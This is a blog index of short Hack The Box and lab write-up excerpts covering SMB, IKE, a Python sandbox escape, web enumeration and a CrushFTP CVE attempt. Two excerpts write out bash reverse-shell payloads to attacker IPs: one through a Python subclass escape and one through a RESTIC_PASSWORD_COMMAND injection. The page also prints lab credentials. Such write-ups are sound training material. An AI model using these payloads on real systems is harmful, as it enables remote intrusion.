Fluffy

Fluffy on Hack The Box is an easy-difficulty box focused on exploiting SMB and Active Directory vulnerabilities. With limited access through an SMB share, we quickly discover a security audit report exposing several critical CVEs. Fluffy Easy Challenge HTB Credentials: j.fleischman / J0elTHEM4n1990! We will test with smbclient to see the shared files. There are indeed files. The PDF may be of interest to us; let's see what it contains. ...

September 11, 2025

Expressway

Expressway Just one port open (SSH) with a TCP scan. Testing with a UDP scan, I find port 500 open; it's isakmp (Internet Security Association and Key Management Protocol), the port used for VPN. ISAKMP is a protocol for establishing security associations and cryptographic keys in an Internet environment. https://en.wikipedia.org/wiki/Internet_Security_Association_and_Key_Management_Protocol I find a blog on HackTricks for exploiting ISAKMP. https://book.hacktricks.wiki/en/network-services-pentesting/ipsec-ike-vpn-pentesting.html sudo ike-scan -M 10.129.7.80 sudo python3 iker.py 10.129.7.80 sudo ike-scan -M --showbackoff 10.129.7.80 sudo ike-scan -P -M -A -n fakeID 10.129.7.80 ...

September 27, 2025

Code

Code Nmap scan https://book.hacktricks.wiki/en/generic-methodologies-and-resources/python/bypass-python-sandboxes/index.html Import does not work. Loop to search for a specific class when you want to obtain it dynamically: for i, cls in enumerate(().__class__.__bases__[0].__subclasses__()): print(i, cls.__name__) It retrieves the 318th class from the object.__subclasses__() list. It instantiates this class by passing it, as an argument, a shell command that opens a reverse shell to 10.10.14.22:4444. ().__class__.__bases__[0].__subclasses__()[317]("bash -c 'bash -i >& /dev/tcp/10.10.14.22/4444 0>&1'", shell=True) ...

September 15, 2025

Boot2root

Boot2Root is a virtual machine. The goal is to obtain root access by finding two different vulnerabilities. The challenge combines several attack vectors, notably reverse engineering, web flaws such as SQL injection, and the possibility of exploiting a PHP file upload to obtain remote code execution. Boot2root Scan Nmap Starting Nmap 7.95 ( https://nmap.org ) at 2025-02-13 09:31 UTC Nmap scan report for 192.168.56.101 Host is up (0.00028s latency). Not shown: 994 closed tcp ports (reset) PORT STATE SERVICE VERSION 21/tcp open ftp vsftpd 2.0.8 or later |_ftp-anon: got code 500 "OOPS: vsftpd: refusing to run with writable root inside chroot()". 22/tcp open ssh OpenSSH 5.9p1 Debian 5ubuntu1.7 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 1024 07:bf:02:20:f0:8a:c8:48:1e:fc:41:ae:a4:46:fa:25 (DSA) | 2048 26:dd:80:a3:df:c4:4b:53:1e:53:42:46:ef:6e:30:b2 (RSA) |_ 256 cf:c3:8c:31:d7:47:7c:84:e2:d2:16:31:b2:8e:63:a7 (ECDSA) 80/tcp open http Apache httpd 2.2.22 ((Ubuntu)) |_http-title: Hack me if you can |_http-server-header: Apache/2.2.22 (Ubuntu) 143/tcp open imap Dovecot imapd |_imap-capabilities: more capabilities IDLE IMAP4rev1 STARTTLS LOGINDISABLEDA0001 have post-login listed OK SASL-IR LOGIN-REFERRALS LITERAL+ ID Pre-login ENABLE |_ssl-date: 2025-02-13T09:32:31+00:00; -1s from scanner time. 443/tcp open ssl/http Apache httpd 2.2.22 |_ssl-date: 2025-02-13T09:32:31+00:00; -1s from scanner time. | ssl-cert: Subject: commonName=BornToSec | Not valid before: 2015-10-08T00:19:46 |_Not valid after: 2025-10-05T00:19:46 |_http-server-header: Apache/2.2.22 (Ubuntu) |_http-title: 404 Not Found 993/tcp open ssl/imaps? |_ssl-date: 2025-02-13T09:32:31+00:00; -1s from scanner time. | ssl-cert: Subject: commonName=localhost/organizationName=Dovecot mail server | Not valid before: 2015-10-08T20:57:30 |_Not valid after: 2025-10-07T20:57:30 No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
Scan Dirbuster Dir found: /cgi-bin/ - 403 Dir found: /forum/ - 200 Dir found: /icons/ - 403 Dir found: /phpmyadmin/ - 200 File found: /forum/index.php - 200 Dir found: /forum/themes/ - 200 Dir found: /forum/themes/default/ - 200 Dir found: /forum/themes/default/images/ - 200 Dir found: /forum/js/ - 200 File found: /forum/js/main.min.js - 200 File found: /phpmyadmin/url.php - 200 File found: /phpmyadmin/Documentation.html - 200 Dir found: /webmail/ - 302 Forum Index ...

September 12, 2025

Artificial

Artificial https://mastersplinter.work/research/tensorflow-rce/ python3 -c 'import pty; pty.spawn("/bin/bash")' ssh -L 9898:localhost:9898 gael@10.129.70.219 I tried another way with cron etc., but nothing worked, and I ended up finding this. This password that encrypts data in your repository. Recommended to pick a value that is 128 bits of entropy (20 chars or longer) You may alternatively provide env variable credentials e.g. RESTIC_PASSWORD, RESTIC_PASSWORD_FILE, or RESTIC_PASSWORD_COMMAND. Click [Generate] to seed a random password from your browser's crypto random API. RESTIC_PASSWORD_COMMAND=bash -c "/bin/bash -i >& /dev/tcp/10.10.15.36/9999 0>&1" ...

October 8, 2025

Soulmate

Soulmate I tested ffuf to enumerate subdomains with: ffuf -w ~/SecLists/Discovery/DNS/namelist.txt -H "Host: FUZZ.soulmate.htb" -u http://soulmate.htb -fs 154 I use -fs 154 because the size of the error page is 154 and -fs filters it out. I find the ftp subdomain for soulmate.htb. I find a CVE or authentication bypass: https://github.com/issamjr/CVE-2025-54309-EXPLOIT The exploit gives an error: https connection refused. So I modify the exploit code, replacing https with http. I tested CVE-2025-54309, but I couldn't get it to work. I later saw that the version of CrushFTP was not vulnerable to it. ...

September 27, 2025